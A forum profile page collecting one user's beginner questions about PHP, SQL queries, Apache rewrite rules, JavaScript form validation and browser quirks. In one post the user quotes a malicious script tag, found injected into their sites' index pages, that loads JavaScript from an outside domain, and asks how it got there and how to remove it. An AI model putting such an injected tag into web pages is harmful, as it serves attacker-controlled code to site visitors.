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Everything posted by ayok

  1. try create just a simple validation on your contact form. I clicked send, and it's just sent a blank message.
  2. It's okay for the first time. Only i see <head> inside a <td>??
  3. Hi, I have an output like this: john,18,Cancer How can I change this to 'john','18','Cancer' with php? Thanks in advanced, ayok
  4. I see.. Ok, thank you. I think I know enough.
  5. Hi sensei, I think that would change the get variables into post when it's sent. What I need to do is sending get and post. So the url from my example will be, ?gettxt=myGetVariable and also send posttxt with value 'myPostVariable'
  6. Hello.. I've got a question. I'm trying to send both variables $_POST and $_GET, but it's not happened. Is it possible to do that? Here is my try: <form action='' name="postget' method='post' style='display: none;'> <input type='text' name='posttxt' value='myPostVariable' /><a href='?gettxt=myGetVariable' onclick='document.postget.submit();'>Send Double vars</a> So far, it doesn't send any variable. So, is it possible to send get and post in one click? If yes, would anybody tell me how? Thanks in advanced, ayok
  7. Thanks. It looks like only my IE. I've tried on other computer. What's happened exactly? I've tried to fix from pop up settings, but still doesn't work. It's not normal. I use IE8 and 7.
  8. Hi, I've got a problem with IE. They block the dropdown function on <select><option></option></select>. They treat this as a pop up. I don't know whether it's only on my IE or all IE. Any idea why it's happened and how to solve? Thanks in advanced.
  9. do you mean, A or B or people that are in A and B (1 person in both groups)? If it's the first scenario then you should apply the same concept, change AND to OR. I need to send to all the people who are in group A and B (not 1 person, and not group C and D). Every person only has one group. Should I change AND to OR? This AND OR confuses me..
  10. Err.. thank's Maq, for a really fast answer and reaction. I meant 2009. Another example. I have a list of people who are in separate groups, say group A, B, C, and D. I need to send email to people who are in group A and B. So the query I have is like SELECT email FROM table WHERE group = A AND group = B. But it doesn't work.
  11. I think it's a simple problem, but I cannot solve it. I need to select from a table where a column has 2 value. For example I have table 'mytable' and a column 'year'. I need to select all where the year is 2007 and 2008. How should I make a query? I've tried SELECT * FROM mytable WHERE year = '2007' AND year = '2009', but it seems that it doesn't work this way. Could someone please help me? (what's wrong with the enter button? I cannot make a paragraf/break line )
  12. Thank you Daniel0. Your reply make me more confident. But how a good php programmer will think if he/she looks at a CMS with procedural programming? Will they think that I'd better use OOP or it's okay? Are the most php programmers using OOP or just a procedural programming?
  13. Hi, I have some questions about using class and framework. I do understand PHP and I can make a simple php application such as guestbook with database connection, and I also understand about functions. However, I do not understand about how to create objects, class nor framework. Some day I need to make a complete CMS for a client. So I made it myself on my php level. It works fine, but there is no class or framework structure in my CMS. As long as it's work, in my opinion, client would like it. However, I am not really confident if a programmer looks at my codes. My questions are, do I need to learn making class and framework? I always had a problem to add or develop someone else's codes, if I used free CMS or framework. Is it bad if I keep my coding style (without class) instead using class or frameworks? Sometimes i see class is more complicated than just functions. Rgds, ayok
  14. I see... so How should I write the restrictions for only (EN/NL/DU) -> 2 capital letters?
  15. Hi, Thanks theonlydrayk. But how if there come more like: http://www.mysite.com/index.php?pageID=2&menu=3&id=1&name=abc&lang=EN? Should it be: RewriteRule ^([0-9]+)-([0-9]+)_([0-9]+)_([a-z]+)_([a-z]+).html$ index.php?pageID=$1&menu=$2&id=$3&name=$4&lang=$5 [NC,L]? ayok
  16. Hi, I don't completely understand about apache, but i need to know about creating clean url for my php site. So far, for a simple website with simple navigation and/or modules I can make static url from simple php url, like index.php?page=home into /home.html. However, when I have 3 or more variables, it becomes more puzzle for me. For some reasons i need to throw variables like this, ?id=1&menu=1&page=news and this make me headache ??? Some even more variables. So far, I've tried and I got this kind of static url, "1-1_news.html", which is fine for me, but then to have more variables like &lang=EN would be another headache for me ??? My question now is how to make even clearer than 1-1_news.html? Like news.html? I've tried 1/1/news.html but then the images are not shown because the links miss the path. This is one of the lines in my .htaccess: RewriteRule ^([0-9_-]+)-([0-9_-]+)_([0-9_-]+)_([a-z_-]+).html$ index.php?pageID=$1&menu=$2&id=$3&name=$4 Thanks, ayok
  17. So they know the ftp password of those sites? Does it simply delete the line and change the password to get rid of it? How can I avoid this to get back? Thanks ayok
  18. Hi, Recently I've found some of my websites has infected by something.. I really don't know how to call it. Some where in the source (usually, index.php or home.php) has this suspicious line. I don't know what's that, but it seems harmful. The script are mostly like below: <!-- ad --><script language=javascript src="http://counter.ironsteelmoney.com/show.js"></script><!-- /ad --> My questions are, what should i call this? Am I being cracked/hacked? How could it be happened? I've deleted it, but I'm not sure whether this won't back. Could please anyone help me? Thank you, ayok
  19. Oh.. I tried the codes i wrote on my first post online, and it works. But the real script i have is much longer. I probably made mistake. I'm going to see first what's wrong. I'll get back if it still doesn't work. Thank you for your replies. ayok
  20. Hi, I have a question regarding my form validation with javascript, which is working on IE, or even on Google chrome, but doesn't work on Firefox. The script is like below: <script type="text/javascript"> <!-- function validateClientForm() { if(document.clientInfo.name.value == ''){ alert('your name please'); clientInfo.name.focus(); return false; } else if(document.clientInfo.adres.value == ''){ alert('your address please'); clientInfo.adres.focus(); return false; } } // --> </script> <form name="clientInfo" method="post" action="send.php" onsubmit="return validateClientForm();"> <input type="text" name="name"/> <input type="text" name="adres"/> <input type="submit" value="send"/> </form> So in other browsers besides firefox, the warning appears if i don't fill in the name and address fields. And when i click ok, it stays on the same page. However in firefox, when i click ok after the alert box appears, it goes to the next page. Could anyone tell me what's wrong with the codes or firefox? Thanks, ayok
  21. It's solved I change RewriteRule ^page/([0-9_-]+)-([0-9_-]+)-([0-9_-]+).html into ^page/([0-9]+)-([0-9]+\-[0-9]+)-([0-9]+)\.html$
  22. Thank you, but it doesn't work.
  23. Hi, I'm trying to make a .htacces file for a cleaner urls with rewriterule. However, I've got a problem with a variable with two values. For example: RewriteRule ^page/([0-9_-]+)-([0-9_-]+)-([0-9_-]+).html$ page/index.php?id=$1&menusOpen=$2&menuId=$3 [L] With this codes I got page/0-12-34.html, but some values of "menusOpen" variable has two or three values like menusOpen=23-24-34 or menusOpen=1-21. So, I can't open those url. I've tried RewriteRule ^page/([0-9_-]+)-([0-9_-]+)-([0-9_-]+)-([0-9_-]+).html$ page/index.php?id=$1&menusOpen=$2-$3&menuId=$4 [L] but it doesn't work. Would anyone help me with this? Thank you, ayok
  24. Ah.. of course.. hehe.. Thanks!
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